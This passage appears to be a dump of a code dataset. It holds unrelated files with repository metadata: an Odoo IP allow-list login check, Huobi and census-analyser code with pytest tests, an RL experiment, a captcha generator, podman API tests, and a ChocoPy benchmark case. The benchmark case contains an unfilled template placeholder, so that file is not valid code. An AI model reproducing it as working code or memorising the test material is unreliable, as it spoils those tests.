_logger = logging.getLogger(__name__)
class User(models.Model):
    """Extend res.users with an optional per-user IP allow-list enforced at login."""
    _inherit = 'res.users'

    # One regular expression per line; the login is accepted when the remote
    # address matches any line. (User-facing help text kept verbatim.)
    allowed_ips = fields.Text(string='Allowed IPs', help=u"""正则匹配
    如:^192\.168\.2\.\d{1,3}$, 支持多个正则,每一个正则单独一行。满足任意一行即可通过。
    """)

    @classmethod
    def authenticate(cls, db, login, password, user_agent_env):
        """Authenticate normally, then reject the login when the user defines
        allowed_ips and REMOTE_ADDR matches none of its regex lines.

        Returns the uid on success, False when blocked or invalid.
        """
        uid = super(User, cls).authenticate(db, login, password, user_agent_env)
        if uid:
            with cls.pool.cursor() as cr:
                # Renamed from `self` (misleading inside a classmethod).
                Users = api.Environment(cr, SUPERUSER_ID, {})[cls._name]
                user = Users.browse(uid)
                if hasattr(user, 'allowed_ips') and user.allowed_ips:
                    addr = user_agent_env['REMOTE_ADDR']
                    if not any(re.match(line, addr) for line in user.allowed_ips.splitlines()):
                        # BUG FIX: Logger.warn is a deprecated alias; use warning().
                        _logger.warning('User login blocked cause of the remote_addr %s not match allowed_ips %s',
                                        user_agent_env['REMOTE_ADDR'], user.allowed_ips)
                        uid = False
                        # super() already validated the password and recorded a
                        # successful login row; since the IP check rejected the
                        # login, mark that latest row as failed.
                        Log = api.Environment(cr, SUPERUSER_ID, {})['auth_login_log.log']
                        Log.search([('login_account', '=', login)], limit=1, order='id desc').write({
                            'note': u'IP受限',
                            'login_status': 'e',
                        })
        return uid
|
[
"guwenfengvip@163.com"
] |
guwenfengvip@163.com
|
760b0eb4c5e3ffc5e8dc4d8b21479bb959617a91
|
0a28bcde2499e6a41e16d88ed62cd2e80a5b464d
|
/hb_quant/huobi/model/subuser/trade_market.py
|
74d22b7034eb44acc3ad53c865621798e9a56b5f
|
[
"MIT"
] |
permissive
|
wenli135/Binance-volatility-trading-bot
|
2cfe66007294b13a89b16d1622d50ce1615f1d66
|
75a03ad61df0e95492128fb6f1f419d4dc256ab3
|
refs/heads/main
| 2023-06-13T06:40:43.855256
| 2021-07-01T02:03:25
| 2021-07-01T02:03:25
| 373,853,320
| 0
| 0
|
MIT
| 2021-06-04T13:38:26
| 2021-06-04T13:38:26
| null |
UTF-8
|
Python
| false
| false
| 658
|
py
|
class TradeMarket:
    """Sub-user trade-market activation record.

    Attributes:
        sub_uid: sub user ID.
        account_type: account type of the sub user.
        activation: sub user account state for the given account type.
    """

    def __init__(self):
        # All fields start empty; they are populated by the API response parser.
        self.sub_uid = ""
        self.account_type = ""
        self.activation = ""

    def print_object(self, format_data=""):
        from huobi.utils.print_mix_object import PrintBasic
        # Dump every field with the optional indentation prefix.
        for field_value, label in ((self.sub_uid, "subUid"),
                                   (self.account_type, "accountType"),
                                   (self.activation, "activation")):
            PrintBasic.print_basic(field_value, format_data + label)
|
[
"wenli@quchaogu.com"
] |
wenli@quchaogu.com
|
214b3914aab920368717b8b7efce2aa7628cfc34
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/pa3/benchmarks/tree-491.py
|
b791356b5b8ce529fe2fb5cf44c992b2430b4224
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,451
|
py
|
# Binary-search trees
class TreeNode(object):
    # One node of a binary search tree; None children are empty leaves.
    # NOTE(review): this file is a ChocoPy benchmark case — keep the
    # explicit annotation style; do not introduce Python-only idioms.
    value:int = 0
    left:"TreeNode" = None
    right:"TreeNode" = None

    def insert(self:"TreeNode", x:int) -> bool:
        # Insert x in the subtree rooted here; return True iff the tree
        # changed (duplicates are rejected).
        if x < self.value:
            if self.left is None:
                self.left = makeNode(x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode(x)
                return True
            else:
                return self.right.insert(x)
        return False

    def contains(self:"TreeNode", x:int) -> bool:
        # Standard binary search for x in the subtree rooted here.
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
class Tree(object):
    # BST wrapper keeping the root node and a running element count.
    root:TreeNode = None
    size:int = 0

    def insert(self:"Tree", x:int) -> object:
        # Insert x; size grows only when x was not already present.
        if self.root is None:
            self.root = makeNode(x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1

    def contains(self:"Tree", x:int) -> bool:
        # Membership test; an empty tree contains nothing.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
    # NOTE(review): `$FuncBodyMember` below is a benchmark-template
    # placeholder, not valid Python/ChocoPy; presumably the test harness
    # substitutes it before compilation — confirm against the generator.
    $FuncBodyMember
    b = TreeNode()
    b.value = x
    return b
# Input parameters
n:int = 100
c:int = 4

# Data
t:Tree = None
i:int = 0
k:int = 37813

# Crunch: insert a pseudo-random stream (multiplicative congruential
# generator, k = k*37813 mod 37831) plus most small loop indices, then
# report the tree size and which of a fixed set of probes are present.
t = Tree()
while i < n:
    t.insert(k)
    k = (k * 37813) % 37831
    if i % c != 0:
        t.insert(i)
    i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
    if t.contains(i):
        print(i)
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
e73e71b19defdf97b66220f6612d3d90b742c593
|
954e69e23e10e18d6f8ac721d8e42d6aabceb9ab
|
/topytorch_all.py
|
c9c65555052d46e5aa3dce65220f004f795fe386
|
[] |
no_license
|
jie311/2018--ZJUAI--PyramidBoxDetector
|
53fc001d6e60fdc67d22ab0864ed1b574c53c182
|
cc9b87b5082df65704a24117ff7136f9d077f49e
|
refs/heads/master
| 2022-09-09T02:30:05.219093
| 2020-05-28T07:37:59
| 2020-05-28T07:37:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,230
|
py
|
# Convert a detection-annotation txt from the PaddlePaddle layout to the
# PyTorch layout, dropping zero-sized boxes and reporting anomalies.

# input: PaddlePaddle-format txt
pdfile = './final_all.txt'
# output: PyTorch-format txt
ptfile = './final_all_pt.txt'

rect = 0    # count of non-square boxes encountered (w != h)
total = 0   # total number of boxes kept in the output

# BUG FIX: the original opened both files without `with`, leaking the
# handles if parsing raised; `with` guarantees they are closed.
with open(pdfile, 'r') as f, open(ptfile, 'w') as f_pt:
    lines = f.readlines()
    i = 0
    while i < len(lines):
        if 'jpg' in lines[i]:
            im_id = lines[i].rstrip()
            # Line after the image id holds the declared box count.
            num = int(lines[i + 1].rstrip())
            i = i + 2
            box = []
            bad = 0  # boxes discarded because w == 0 or h == 0
            for j in range(num):
                x1, y1, w, h = map(int, lines[i].rstrip().split(' ')[0:4])
                if w != h:
                    # Non-square boxes are reported but still kept.
                    print(im_id)
                    print(w, h)
                    rect += 1
                if w == 0 or h == 0:
                    bad += 1
                    i = i + 1
                    continue
                else:
                    box.append([x1, y1, w, h])
                    i = i + 1
            num = num - bad
            total += num
            # Only emit images that still have at least one valid box.
            if num > 0:
                f_pt.write(im_id)
                f_pt.write(' {0}'.format(num))
                for [x1, y1, w, h] in box:
                    f_pt.write(' {0} {1} {2} {3}'.format(x1, y1, w, h))
                f_pt.write('\n')
        else:
            i = i + 1

print(rect)
print(total)
|
[
"2755289083@qq.com"
] |
2755289083@qq.com
|
249ab99aec490d4e6164883dbd8dea5220340a17
|
19d6bddc562b8cc3c7a6e67465f7601c74979e05
|
/results/190902/failed/lifelong-stochastic-tight-big_h-11_w-11/stochastic-tight-big.py
|
9b63dc6b158b73d05568948f1f0b3b6fa474c43e
|
[] |
no_license
|
SuReLI/llrl
|
3bca1d1c755e5c59a5d242c18df997ed17f546d0
|
5f581cdded3cdecf69a8af76dc624494d82a4034
|
refs/heads/master
| 2023-01-08T04:04:28.358563
| 2020-11-06T10:27:33
| 2020-11-06T10:27:33
| 169,303,041
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,358
|
py
|
"""
Lifelong RL experiment in constant transition function setting
"""
import numpy as np
from llrl.agents.rmax import RMax
from llrl.agents.lrmax import LRMax
from llrl.agents.maxqinit import MaxQInit
from llrl.agents.lrmaxqinit import LRMaxQInit
from llrl.utils.env_handler import make_env_distribution
from llrl.experiments import run_agents_lifelong
def experiment():
    """Run the lifelong-RL agent comparison on the stochastic-tight-big domain."""
    # Shared hyper-parameters
    gamma = .9
    env_distribution = make_env_distribution(env_class='stochastic-tight-big', env_name='stochastic-tight-big', gamma=gamma)
    actions = env_distribution.get_actions()
    n_known = 10
    p_min = 1. / 5.
    epsilon_q = .01
    epsilon_m = .01
    delta = .1
    r_max = 1.
    v_max = 1.
    n_states = 4
    max_mem = 20

    # Keyword arguments common to every agent.
    base = dict(actions=actions, gamma=gamma, r_max=r_max, v_max=v_max, deduce_v_max=False,
                n_known=n_known, deduce_n_known=False, epsilon_q=epsilon_q, epsilon_m=epsilon_m)
    # Extra arguments shared by the task-distribution-aware agents.
    lifelong = dict(delta=delta, n_states=n_states, min_sampling_probability=p_min)
    # Transfer agents additionally estimate distances online with bounded memory.
    transfer = dict(max_memory_size=max_mem, estimate_distances_online=True, **lifelong)

    agents_pool = [
        RMax(name='RMax', **base),
        LRMax(prior=None, name='LRMax', **base, **transfer),
        LRMax(prior=0.2, name='LRMax(Dmax=0.2)', **base, **transfer),
        MaxQInit(name='MaxQInit', **base, **lifelong),
        LRMaxQInit(prior=None, name='LRMaxQInit', **base, **transfer),
        LRMaxQInit(prior=0.2, name='LRMaxQInit(Dmax=0.2)', **base, **transfer),
    ]

    # Run
    run_agents_lifelong(agents_pool, env_distribution, n_instances=2, n_tasks=80, n_episodes=80, n_steps=100,
                        reset_at_terminal=False, open_plot=False, plot_title=True, do_run=True, do_plot=True,
                        parallel_run=True, n_processes=None)
if __name__ == '__main__':
    # Fixed seed so repeated runs sample the same task sequence.
    np.random.seed(1993)
    experiment()
|
[
"erwan.lc2@gmail.com"
] |
erwan.lc2@gmail.com
|
6dcec5b996d8a262227be3e7686fc90e5ef05185
|
fc5816b2ba73124a4744d08b7acf8f62ced66640
|
/timer.py
|
ec255d136560e92c284404460b1a319a77e14567
|
[] |
no_license
|
rkdarst/fitz
|
51e2b9e28a36ffe2b58f49ff36a4593ca55c5045
|
b2ac6aaff47217f40ac39042d27ffd130b8a36a5
|
refs/heads/master
| 2016-09-05T17:20:52.187546
| 2015-05-16T10:49:14
| 2015-05-16T10:49:14
| 22,289,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,755
|
py
|
# Richard Darst, 2006
"""Provides a stopwatch for code.
Classes
=======
There is a class defined called Timer. It has the following methods:
__init__ -- argument is `clock`, which is the timing function to use
for this timer. It defaults to proctime.
reset -- zero the stopwatch. The getrusage system call is zeroed when
the code starts (and the timer keeps this zero initially),
but calling reset() zeros it. Zeroing is done by recording
the current time and subtracting this out from future calls.
time -- returns the time since the last reset
lap -- return the time from the last reset, and reset it.
Global functions
================
t -- an automatically created instance of timer, using `proctime`.
reset-- ~\ The methods on `t` are bound to the module namespace,
time -- > so timer.reset(), timer.time(), etc. can be used if this
lap  -- _/ is what you need.
The module includes various clock functions to use, such as
`realtime`, `proctime`, `usertime`, and `systime`.
"""
import resource
import time as timemodule
def systime():
    """Return CPU time this process has spent in kernel mode, in seconds.

    Covers work such as disk access and other I/O done on the process's
    behalf; taken from getrusage().ru_stime.
    """
    usage = resource.getrusage(resource.RUSAGE_SELF)
    return usage.ru_stime
def usertime():
    """Return CPU time this process has spent in user mode, in seconds.

    Covers ordinary computation; taken from getrusage().ru_utime.
    """
    usage = resource.getrusage(resource.RUSAGE_SELF)
    return usage.ru_utime
def proctime():
    """Return total processor time used by this process: user + system."""
    usage = resource.getrusage(resource.RUSAGE_SELF)
    return usage.ru_stime + usage.ru_utime
def realtime():
    """Return wall-clock time, in seconds since the epoch.

    Best choice for measuring elapsed real time when the machine is idle;
    delegates to time.time() (gettimeofday where available).
    """
    return timemodule.time()
class Timer:
    """A resettable stopwatch built on a pluggable clock function."""

    _starttime = 0.

    def __init__(self, clock=proctime):
        """Create a stopwatch.

        clock -- zero-argument function returning the current time;
                 defaults to proctime (user + system CPU time).
        """
        self._clock = clock

    def reset(self):
        """Zero the stopwatch at the current clock value."""
        self._starttime = self._clock()

    def time(self):
        """Return the time elapsed since the last reset."""
        return self._clock() - self._starttime

    def lap(self):
        """Return the time elapsed since the last reset, then reset."""
        elapsed = self._clock() - self._starttime
        self._starttime = self._clock()
        return elapsed
# Default module-level timer (proctime clock). Its bound methods are
# re-exported so timer.reset()/timer.time()/timer.lap() can be called
# directly. NOTE: `time` here shadows the stdlib module's name inside
# this module (the module imported it as `timemodule` for that reason).
t = Timer()
reset = t.reset
time = t.time
lap = t.lap
|
[
"rkd@zgib.net"
] |
rkd@zgib.net
|
16a3fc07f5076c8209e850bf5fae219bc5f9d24a
|
a718de5d51c8d430e791aca6092669c04548fd64
|
/Census-Analyser-master/census_analyser/test_census.py
|
a1d7d9093033bac09637e510c928fb25d4e80fa1
|
[] |
no_license
|
santoshikalaskar/Basic_Advance_python_program
|
d0fef4134ed4b14f84ff05a3b37e1773c111a2d1
|
84df5c336d5304c3c727102194ba62417640643a
|
refs/heads/master
| 2023-01-22T15:06:24.909145
| 2020-12-02T14:01:29
| 2020-12-02T14:01:29
| 314,511,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,451
|
py
|
import pytest
from stateCensusAnalyser import CSVStateCensus, SortData, Mapping
from custom_exceptions import ( FileIsNotCSVTypeException,
EmptyFileException,
InvalidDelimiterException)
# Shared helper instances reused by every test method below.
sort_ref = SortData()
map_ref = Mapping()
class TestCensus:
    """pytest suite for CSVStateCensus, SortData and Mapping.

    Expected counts and first/last records are pinned to the bundled
    IndiaStateCensusData.csv and StateCode.csv fixture files, so any
    change to those files must update these assertions.
    """

    # --- UC1: loading and validating the census CSV ---
    def test_State_census_records_to_match_number_of_records_UC1_TC1(self):
        obj = CSVStateCensus("IndiaStateCensusData.csv")
        total_records = obj.number_of_records(obj.load_CSV)
        assert total_records == 28

    def test_file_not_in_csv_format_will_raise_FileIsNotCSVTypeException_UC1_TC2(self):
        with pytest.raises(FileIsNotCSVTypeException):
            obj = CSVStateCensus("demo_empty.txt")
            obj.load_CSV

    def test_file_is_csv_but_empty_will_raise_EmptyFileException_UC1_TC3(self):
        with pytest.raises(EmptyFileException):
            obj = CSVStateCensus("demo_empty.csv")
            obj.load_CSV

    def test_file_is_csv_but_delimiter_is_invalid_will_raise_InvalidDelimiterException_UC1_TC4(self):
        with pytest.raises(InvalidDelimiterException):
            obj = CSVStateCensus('csv_with_invalid_delimiter.csv')
            obj.load_CSV

    def test_file_is_csv_but_header_is_invalid_will_return_InvalidHeader_UC1_TC5(self):
        # A bad header is reported as a sentinel value, not an exception.
        obj = CSVStateCensus("csv_with_invalid_header.csv")
        assert obj.load_CSV == "InvalidHeader"

    # --- UC2: loading the state-code CSV ---
    def test_State_code_records_to_match_number_of_records_UC2_TC1(self):
        obj = CSVStateCensus("StateCode.csv")
        total_records = obj.number_of_records(obj.load_CSV)
        assert total_records == 36

    # --- UC3-UC7: sorting and mapping (private methods accessed via
    # their name-mangled form) ---
    def test_IndiaStateCensus_first_state_after_sorting_in_JSON_will_be_Andhra_Pradesh_UC3(self):
        data_frame = sort_ref._SortData__sort_InidaCensusData_in_alphabetical_order_in_JSON()
        assert data_frame[0]["State"] == 'Andhra Pradesh'

    def test_IndiaStateCensus_last_state_after_sorting_in_JSON_will_be_West_Bengal_UC3(self):
        data_frame = sort_ref._SortData__sort_InidaCensusData_in_alphabetical_order_in_JSON()
        assert data_frame[28]["State"] == 'West Bengal'

    def test_StateCode_first_stateCode_after_sorting_in_JSON_will_be_AD_UC4(self):
        data_frame = sort_ref._SortData__sort_StateCode_in_stateCode_order_in_JSON()
        assert data_frame[0]["StateCode"] == 'AD'

    def test_StateCode_last_stateCode_after_sorting_in_JSON_will_be_WB_UC4(self):
        data_frame = sort_ref._SortData__sort_StateCode_in_stateCode_order_in_JSON()
        assert data_frame.pop()["StateCode"] == 'WB'

    def test_after_sort_according_to_population_check_first_record_will_be_Sikkim_UC5(self):
        data = sort_ref._SortData__sort_InidaCensusData_in_asc_population_order_in_JSON()
        assert data[0]["State"] == "Sikkim"

    def test_after_sort_according_to_population_check_last_record_will_be_Uttar_Pradesh_UC5(self):
        data = sort_ref._SortData__sort_InidaCensusData_in_asc_population_order_in_JSON()
        assert data.pop()["State"] == "Uttar Pradesh"

    def test_after_sort_according_to_populationDensity_check_first_record_will_be_Arunachal_Pradesh_UC6(self):
        data = sort_ref._SortData__sort_InidaCensusData_in_asc_population_density_order_in_JSON()
        assert data[0]["State"] == "Arunachal Pradesh"

    def test_after_sort_according_to_populationDensity_check_last_record_will_be_Bihar_UC6(self):
        data = sort_ref._SortData__sort_InidaCensusData_in_asc_population_density_order_in_JSON()
        assert data.pop()["State"] == "Bihar"

    def test_mapping_by_checking_first_record_will_be_AP_REFACTOR6(self):
        data = map_ref._Mapping__map_state_census_with_state_code_according_to_code()
        assert data[0]["StateCode"] == 'AP'

    def test_mapping_by_checking_last_record_will_be_WB_REFACTOR6(self):
        data = map_ref._Mapping__map_state_census_with_state_code_according_to_code()
        assert data.pop()["StateCode"] == 'WB'

    def test_first_state_from_census_data_after_sorting_in_desc_area_order_will_return_Rajasthan_UC7(self):
        data = sort_ref._SortData__sort_InidaCensusData_in_desc_area_order_in_JSON()
        assert data[0]["State"] == "Rajasthan"

    def test_last_state_from_census_data_after_sorting_in_desc_area_order_will_return_Goa_UC7(self):
        data = sort_ref._SortData__sort_InidaCensusData_in_desc_area_order_in_JSON()
        assert data.pop()["State"] == "Goa"
|
[
"kalaskars1996@gmail.com"
] |
kalaskars1996@gmail.com
|
0c80371e2bfa26e44298ef6ee0467de3c1f87c35
|
d697c1d45e96bd440be9c17ab14243a5882b1f52
|
/qianfeng/常用模块/Tkinter/Button.py
|
b271d275b4103dc54132277c710592fefe06f946
|
[] |
no_license
|
ithjl521/python
|
9eeda2e60dda97ee36e8764c06400eb12818689f
|
f4fe50799501c483cb64445fd05ee0f30f56576c
|
refs/heads/master
| 2020-07-12T23:10:53.608276
| 2019-11-08T08:59:35
| 2019-11-08T08:59:35
| 204,931,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 334
|
py
|
import tkinter
def fun():
    """Button callback: print a greeting to stdout."""
    # BUG FIX: corrected message typo 'hello word' -> 'hello world'.
    print('hello world')
# Build a 400x400 window at screen offset (200, 50).
win = tkinter.Tk()
win.title('title-hjl')
win.geometry("400x400+200+50")

# Create a button wired to fun()
button = tkinter.Button(win,
                        text='按钮',
                        command=fun,
                        width=10,
                        height=10)
button.pack()

# Second button exits the main loop.
button2 = tkinter.Button(win,
                         text='按钮',
                         command=win.quit)
button2.pack()

win.mainloop()
|
[
"it_hjl@163.com"
] |
it_hjl@163.com
|
ff5da7da6b07126320c3f20bf185a5bb97f29a76
|
45edff14271724c5bf27e62e96eeb635840eae22
|
/DeepLearning/tensorflow/10-1验证码生成.py
|
088f13b02cdcbe8d829ad08df6367e5e7919adc9
|
[] |
no_license
|
DaiJitao/machine_learning
|
1e41208dc94836a97e57a4b0f5778f8da2bb81d4
|
49e1db9ecbfbf886a11ce416eea402d214cf2049
|
refs/heads/master
| 2021-06-25T23:52:06.066315
| 2021-02-07T16:17:50
| 2021-02-07T16:17:50
| 209,712,507
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,595
|
py
|
# coding: utf-8
# In[1]:
# 验证码生成库
from captcha.image import ImageCaptcha # pip install captcha
import numpy as np
from PIL import Image
import random
import sys
from DeepLearning.utils import mkdir
# Character pool for the generated codes: decimal digits only.
number = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']


def random_captcha_text(char_set=number, captcha_size=4):
    """Return a list of `captcha_size` characters drawn uniformly from `char_set`."""
    return [random.choice(char_set) for _ in range(captcha_size)]
# 生成字符对应的验证码
def gen_captcha_text_and_image(out_path='E:/data/captcha/images/'):
    """Generate one captcha image, named after its own text, under out_path."""
    renderer = ImageCaptcha()
    # Draw a random code and join it into a single string.
    text = ''.join(random_captcha_text())
    # In-memory rendering kept from the original (result unused).
    rendered = renderer.generate(text)
    mkdir(out_path)
    # The file name doubles as the label: <code>.jpg
    renderer.write(text, out_path + text + '.jpg')
# Fewer than 10000 unique files may result, because duplicate codes
# overwrite the same file name.
num = 10000
if __name__ == '__main__':
    for i in range(num):
        gen_captcha_text_and_image()
        # One-line progress indicator rewritten in place via '\r'.
        sys.stdout.write('\r>> Creating image %d/%d' % (i+1, num))
        sys.stdout.flush()
    sys.stdout.write('\n')
    sys.stdout.flush()
    print("生成完毕")
|
[
"976185561@qq.com"
] |
976185561@qq.com
|
ea796738c0ea8c09243d2bef06d9183481be9d08
|
d2f7471c1429f1ca454bb4cc982bbbecc31f8160
|
/app/conf/wsgi.py
|
9cc41bf59a4f0f8c847660a80aebaaa9ea5625f6
|
[
"MIT"
] |
permissive
|
HenriqueLR/hangman-game
|
1e442735f688c4e0b2ada6f2208360a01e0df353
|
6cb29ae1ab666af0d6b054b2e1d598ebb5ff8db3
|
refs/heads/master
| 2021-08-22T03:39:08.156486
| 2017-11-29T05:08:56
| 2017-11-29T05:08:56
| 108,403,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
WSGI config for app project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/
"""
import os

# Point Django at the production settings before the application object
# is created (must happen before get_wsgi_application runs).
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "conf.settings_production")

from django.core.wsgi import get_wsgi_application

# WSGI entry point used by the application server (gunicorn/uWSGI/etc.).
application = get_wsgi_application()
|
[
"henrique.lr89@gmail.com"
] |
henrique.lr89@gmail.com
|
baaea832d2de21fc9bdca57ef60c88bc7b43cf92
|
df2cbe914f463ad050d7ed26194424afbe3a0a52
|
/addons/website_sale/models/product_image.py
|
eea9afb69671067f39780fa6041a4031d9e785e0
|
[
"Apache-2.0"
] |
permissive
|
SHIVJITH/Odoo_Machine_Test
|
019ed339e995be980606a2d87a63312ddc18e706
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
refs/heads/main
| 2023-07-16T16:23:14.300656
| 2021-08-29T11:48:36
| 2021-08-29T11:48:36
| 401,010,175
| 0
| 0
|
Apache-2.0
| 2021-08-29T10:13:58
| 2021-08-29T10:13:58
| null |
UTF-8
|
Python
| false
| false
| 2,699
|
py
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, tools, _
from odoo.exceptions import ValidationError
from odoo.addons.website.tools import get_video_embed_code
class ProductImage(models.Model):
    """Extra image/video attached to a product template or variant."""
    _name = 'product.image'
    _description = "Product Image"
    _inherit = ['image.mixin']
    _order = 'sequence, id'

    name = fields.Char("Name", required=True)
    # Lower sequence = displayed first (see _order).
    sequence = fields.Integer(default=10, index=True)

    image_1920 = fields.Image(required=True)

    # An image belongs either to a whole template or to a single variant.
    product_tmpl_id = fields.Many2one('product.template', "Product Template", index=True, ondelete='cascade')
    product_variant_id = fields.Many2one('product.product', "Product Variant", index=True, ondelete='cascade')
    video_url = fields.Char('Video URL',
                            help='URL of a video for showcasing your product.')
    embed_code = fields.Char(compute="_compute_embed_code")

    # Zoom only makes sense when the 1920px source has more detail than
    # the 1024px rendition.
    can_image_1024_be_zoomed = fields.Boolean("Can Image 1024 be zoomed", compute='_compute_can_image_1024_be_zoomed', store=True)

    @api.depends('image_1920', 'image_1024')
    def _compute_can_image_1024_be_zoomed(self):
        for image in self:
            image.can_image_1024_be_zoomed = image.image_1920 and tools.is_image_size_above(image.image_1920, image.image_1024)

    @api.depends('video_url')
    def _compute_embed_code(self):
        for image in self:
            image.embed_code = get_video_embed_code(image.video_url)

    @api.constrains('video_url')
    def _check_valid_video_url(self):
        # A URL that yields no embed code is treated as invalid.
        for image in self:
            if image.video_url and not image.embed_code:
                raise ValidationError(_("Provided video URL for '%s' is not valid. Please enter a valid video URL.", image.name))

    @api.model_create_multi
    def create(self, vals_list):
        """
        We don't want the default_product_tmpl_id from the context
        to be applied if we have a product_variant_id set to avoid
        having the variant images to show also as template images.
        But we want it if we don't have a product_variant_id set.
        """
        context_without_template = self.with_context({k: v for k, v in self.env.context.items() if k != 'default_product_tmpl_id'})
        normal_vals = []
        variant_vals_list = []
        for vals in vals_list:
            if vals.get('product_variant_id') and 'default_product_tmpl_id' in self.env.context:
                variant_vals_list.append(vals)
            else:
                normal_vals.append(vals)
        return super().create(normal_vals) + super(ProductImage, context_without_template).create(variant_vals_list)
|
[
"36736117+SHIVJITH@users.noreply.github.com"
] |
36736117+SHIVJITH@users.noreply.github.com
|
c227bd7e8a5d2110d0ff22a4bd3d177ce65344de
|
d8db486c6c0e4f7c4da3dd9d8752a2de0174a1d6
|
/test/apiv2/rest_api/v1_test_rest_v1_0_0.py
|
acd6273ef57d7afcf195aca5cd60f67e8b9c27dd
|
[
"Apache-2.0"
] |
permissive
|
isabella232/podman
|
49c10ca0df99bbc4362b8ec284b43bf05c38cca8
|
dcd498a6885f0293934214af0c6fc2d3c7717bd5
|
refs/heads/master
| 2023-03-07T23:36:51.958197
| 2020-11-18T15:59:41
| 2020-11-18T15:59:41
| 314,002,564
| 0
| 0
|
Apache-2.0
| 2021-02-23T16:35:32
| 2020-11-18T17:06:49
| null |
UTF-8
|
Python
| false
| false
| 7,662
|
py
|
import json
import os
import shlex
import signal
import string
import subprocess
import sys
import time
import unittest
from collections.abc import Iterable
from multiprocessing import Process
import requests
from dateutil.parser import parse
PODMAN_URL = "http://localhost:8080"
def _url(path):
return PODMAN_URL + "/v1.0.0/libpod" + path
def podman():
    """Return the podman binary path: $PODMAN_BINARY, else 'bin/podman'."""
    binary = os.getenv("PODMAN_BINARY")
    return "bin/podman" if binary is None else binary
def ctnr(path):
    """Format *path* with the ID of the first container (any state).

    Re-raises after logging if the container listing cannot be parsed.
    """
    resp = requests.get(_url("/containers/json?all=true"))
    try:
        containers = json.loads(resp.text)
    except Exception as e:
        sys.stderr.write("Bad container response: {}/{}".format(resp.text, e))
        raise e
    return path.format(containers[0]["Id"])
class TestApi(unittest.TestCase):
podman = None
def setUp(self):
super().setUp()
if TestApi.podman.poll() is not None:
sys.stderr.write("podman service returned {}", TestApi.podman.returncode)
sys.exit(2)
requests.get(_url("/images/create?fromSrc=docker.io%2Falpine%3Alatest"))
# calling out to podman is easier than the API for running a container
subprocess.run(
[podman(), "run", "alpine", "/bin/ls"],
check=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
    @classmethod
    def setUpClass(cls):
        """Start one shared podman API service on tcp:localhost:8080."""
        super().setUpClass()
        TestApi.podman = subprocess.Popen(
            [
                podman(),
                "system",
                "service",
                "tcp:localhost:8080",
                "--log-level=debug",
                "--time=0",
            ],
            shell=False,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
        # Give the service a moment to start listening before tests run.
        time.sleep(2)
    @classmethod
    def tearDownClass(cls):
        """Stop the service; fail the run if it exited with an error."""
        TestApi.podman.terminate()
        stdout, stderr = TestApi.podman.communicate(timeout=0.5)
        # NOTE(review): stdout/stderr are None here because Popen was
        # started with DEVNULL pipes, so these branches never fire.
        if stdout:
            print("\nService Stdout:\n" + stdout.decode("utf-8"))
        if stderr:
            print("\nService Stderr:\n" + stderr.decode("utf-8"))

        if TestApi.podman.returncode > 0:
            sys.stderr.write(
                "podman exited with error code {}\n".format(TestApi.podman.returncode)
            )
            sys.exit(2)
        return super().tearDownClass()
    def test_info(self):
        """GET /info returns 200 with a parseable JSON body."""
        r = requests.get(_url("/info"))
        self.assertEqual(r.status_code, 200)
        self.assertIsNotNone(r.content)
        _ = json.loads(r.text)
    def test_events(self):
        """GET /events (non-streaming) returns one JSON object per line."""
        r = requests.get(_url("/events?stream=false"))
        self.assertEqual(r.status_code, 200, r.text)
        self.assertIsNotNone(r.content)
        for line in r.text.splitlines():
            obj = json.loads(line)
            # Actor.ID is uppercase for compatibility
            _ = obj["Actor"]["ID"]
    def test_containers(self):
        """Without all=true the listing excludes the stopped container."""
        r = requests.get(_url("/containers/json"), timeout=5)
        self.assertEqual(r.status_code, 200, r.text)
        obj = json.loads(r.text)
        self.assertEqual(len(obj), 0)
    def test_containers_all(self):
        """With all=true the listing includes stopped containers."""
        r = requests.get(_url("/containers/json?all=true"))
        self.assertEqual(r.status_code, 200, r.text)
        self.validateObjectFields(r.text)
    def test_inspect_container(self):
        """Inspecting a container yields an Id and a parseable Created date."""
        r = requests.get(_url(ctnr("/containers/{}/json")))
        self.assertEqual(r.status_code, 200, r.text)
        obj = self.validateObjectFields(r.content)
        _ = parse(obj["Created"])
    def test_stats(self):
        """Stats return 200 for a running container, 409 for a stopped one."""
        r = requests.get(_url(ctnr("/containers/{}/stats?stream=false")))
        self.assertIn(r.status_code, (200, 409), r.text)
        if r.status_code == 200:
            self.validateObjectFields(r.text)
    def test_delete_containers(self):
        """Deleting a stopped container returns 204 (no body)."""
        r = requests.delete(_url(ctnr("/containers/{}")))
